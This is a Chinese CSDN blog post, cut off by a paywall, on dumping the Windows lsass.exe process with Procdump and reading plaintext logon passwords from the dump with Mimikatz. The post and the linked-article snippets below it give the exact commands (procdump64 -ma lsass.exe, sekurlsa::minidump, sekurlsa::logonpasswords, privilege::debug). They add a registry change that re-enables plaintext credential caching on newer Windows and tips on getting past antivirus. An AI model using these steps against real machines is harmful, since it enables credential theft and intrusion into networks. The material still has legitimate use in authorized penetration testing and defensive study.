Procdump+Mimikatz获取Windows明文密码

最新推荐文章于 2024-08-07 09:45:00 发布
最新推荐文章于 2024-08-07 09:45:00 发布
阅读量2.4k 收藏 3
点赞数
分类专栏: 内网渗透 文章标签: 密码抓取 mimikatz procdump Windows明文密码 lsass
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SheXinK/article/details/102995669
版权
本文介绍了如何在Server 2008 R2和Server 2012 R2上利用Procdump和Mimikatz工具抓取Windows系统的明文密码。在2008 R2中,直接使用工具成功获取了 Administrator 的密码,而在2012 R2中,由于系统安全增强,需要修改注册表后才能获取。详细步骤包括生成存储文件、修改注册表和执行Mimikatz命令。
摘要由CSDN通过智能技术生成

Procdump+Mimikatz获取Windows明文密码

1、 测试环境

 系统:
  Server 2008 R2
  Server 2012 R2

 工具:
   Procdump:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
   mimikatz:https://github.com/gentilkiwi/mimikatz/releases

2、 抓取密码

 2.1 Server 2008 R2抓取

  2.1.1 生成存储文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

  2.1.2 mimiakatz密码获取
cmd运行mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

  如图:成功抓取到Administrator密码明文

最低0.47元/天 解锁文章
SheXinK
关注
专栏目录
windows明文密码读取
09-28
windows明文密码读取,需要administrator权限
利用Procdump+Mimikatz获取Windows帐户密码
cj_Hydra's Blog
01-29 1045
复现过程 导出lsass.exe 首先要获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到,这里用到微软官方发布的工具Procdump导出lsass.exe,所以不存在被杀软拦截的情况: 上传文件procdump64.exe到可执行目录中,执行下面语句: procdump64.exe -accepteula -ma lsass.exe lsass.dmp ...
萌新如何玩转mimikatz
最新发布
Python单行客的博客
08-07 1086
萌新如何玩转mimikatz
Procdump+mimikatz绕过安全防护读取密码
xxx9686的博客
09-16 343
在我们提权过程中经常会遇到杀毒软件,在我们将提权exp或者密码读取工具一上传至目标服务器立马被删的尴尬,本文完美解决此问题。Procdump是微软自家的外部工具,其主要目的是监视应用程序中的CPU尖峰并在尖峰期间生成崩溃转储。运行后将会保存lsass到本地,我们可以将该文件拖动到物理机中,使用mimikatz对其密码查看。使用procdump转储lsass进程。
mimikatz配合procdump抓取密码
qq_44881113的博客
09-16 3963
0x01 获取本地帐户密码 1.1 本地执行 下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行: (不是管理员会报错) #提升权限 privilege::debug #抓取密码 sekurlsa::logonpasswords 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider
procdump + mimikatz 获取window10系统密码的方法
onlyfunboy的专栏
06-17 1303
1,管理员权限打开cmd,进入对应目录 procdump64.exe -accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件 2,管理员权限打开mimikatz.exe 执行privilege::debug; 3,管理员权限打开cmd,进入对应目录 把lsass.dmp放在mimikatz目录利用 mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit .
procdump+mimikatz.zip
11-14
mimikatz是由法国安全研究员Benjamin Delpy开发的开源工具,主要用于获取Windows系统的敏感信息,如明文密码、kerberos票证、LSA(本地安全机构)秘密等。mimikatz因其强大的信息收集能力,常常被安全研究人员用于...
procdump32_64+mimikatz.rar
06-15
它能获取到LSA(Local Security Authority)的秘密,包括明文的用户密码、NTLM哈希、 Kerberos票证等。Mimikatz也常用于安全测试,以检测系统对凭证处理的防护措施是否足够。 **结合使用** 在本例中,将procdump与...
内网渗透Windows密码凭证获取
qq_46258964的博客
06-09 2798
记录一下抓取window凭证信息的一些工具 Windows凭证抓取1,procdump (官方工具无视免杀)(首选) procdump + mimikatz 加载dmp文件,并导出其中的明文密码(procdump过杀软) 2,注册表读取windows hash (首选) 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 注册表读取密码主要获取的是3个文件 3,Pwdump 4,mimikatz(名声最大的密码获取工具) 5,MSF MSF框架密
Windows明文密码获取
xiangshen1990的博客
03-14 3346
Windows明文密码获取1:简介2:前提3:无安全软件3.1:在线获取3.2:离线获取4:针对symantec为代表的各种EDR抓取4.1:思路4.2:实现后记 1:简介 作者为网络安全从业者,专注红蓝对抗、本文尝试通过框架性梳理的方式来整理一些细致的知识点,将它们串联起来方便记忆。 本文将探讨如下几个方面的内容: 1:无安全软件情况下获取windows明文密码的方法。 2:针对symantec...
获取本机所有明文密码
08-15
工具可以轻松获取,系统密码,包括浏览器存储的密码,以及各种邮箱,等系统所有密码
获取Windows明文密码的小技巧
09-22 1236
在实战中,拿到一台Windows服务器权限,如果可以直接获取Windows明文密码的话,就可以更容易深入挖掘。本文分享几个获取Windows明文密码的技巧,简单直接且有效。01、Procd...
利用procdump+mimikatz读取windows系统中的密码
LUOBIKUN的博客
09-07 3490
利用procdump+mimikatz读取windows系统中的密码 今天在学习的过程中,认识了一个工具,可以很简单的就读取windows系统的密码,觉得特别有趣,就自己亲自上手尝试了一下,果然很简单,就是因为比较笨,过程有点曲折,特此记录。 工具我也都整理好了, 链接:https://pan.baidu.com/s/1005cCJe-gJq_Q2vZ7M9lwg 提取码:b1q6 procdump,可以将lsass进程的内存文件导出来; mimikatz,可以对导出的内存文件进行分析,从而获取密码。 1,
轻松获取windows 明文登录密码(入侵提权后)
byteway的专栏
04-02 9309
一款获取Windows明文密码的小工具,自己在XP,windows 7 旗舰版上测试成功的。 简单原理: windows 将登录密码加密后没有存文件,而是存在内存中,这样只要我们找到对应的内存段,然后解密那块内存,明文密码就到手了,这里已知windows 的加密密码内存段是在lsass的进程空间里,好了,黑阔们,只要注入到他的进程空间,定位到那块内存,剩下的事就是逆向一个字符串加密算法的过程了,
procdumpmimikatz联动
weixin_45715461的博客
06-30 719
procdumpmimikatz联动
Procdump&mimikatz&NatBypass
AaronLuo
06-30 508
Procdump抓取密码 Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因 首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略 使用管理员权限,利用procdump64.exe(或procdump32.exe)导出lsass.dmp procdump64.exe -accepteula -ma lsass.exe lsass.dmp
密码抓取--Prodump+Mimikatz抓取windows系统密码
网络安全。
02-13 1406
1、查看目标系统管理员登录情况,管理员在线,抓到明文密码的可能性更大。 query user 2、查看目标系统版本。 wmic OS get Caption,OSArchitecture 3、通过Procdump dump lsass.exe 进程数据并将其保存到 lsass.dmp 文件中。 procdump64.exe -accepteula -ma lsass.exe lsass.dmp...
内网渗透:密码凭证获取技术详解
"这篇文档是关于内网渗透测试中密码凭证获取的总结,重点讨论了在Windows系统中如何获取本地用户凭据,包括SAM文件和lsass.exe进程中的信息。内容涉及利用reg命令保存SAM文件,使用mimikatz工具提取密码Hash,以及...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值